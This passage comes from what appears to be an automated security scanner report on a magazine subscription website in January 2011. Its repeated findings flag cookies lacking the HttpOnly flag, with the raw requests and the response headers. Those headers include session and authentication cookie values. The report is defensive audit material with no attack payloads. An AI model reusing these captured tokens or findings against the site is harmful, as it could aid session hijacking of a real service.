Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29610


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:13 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:52 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

11.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:14 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30231


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Details HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:07 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:59 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27507


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ElegantBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:04 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

11.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GQ HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:58 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:38 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29732


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Glamour HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:15 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:55 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29760


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:39 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:18 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27700


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfWorld HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:28 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27910


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Lucky HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:30 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29740


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ModernBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

11.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_NewYorker HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:46 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30082


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Self HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:03 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Dft1_pxBjhT64qTXywTQT1R:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAE%0aGONswVFm2hpNJHAn604U%2ftoCUUE1BDFuNTRos3CBUAShEK4IkYeQeHazq%2bozYow%3d; Path=/
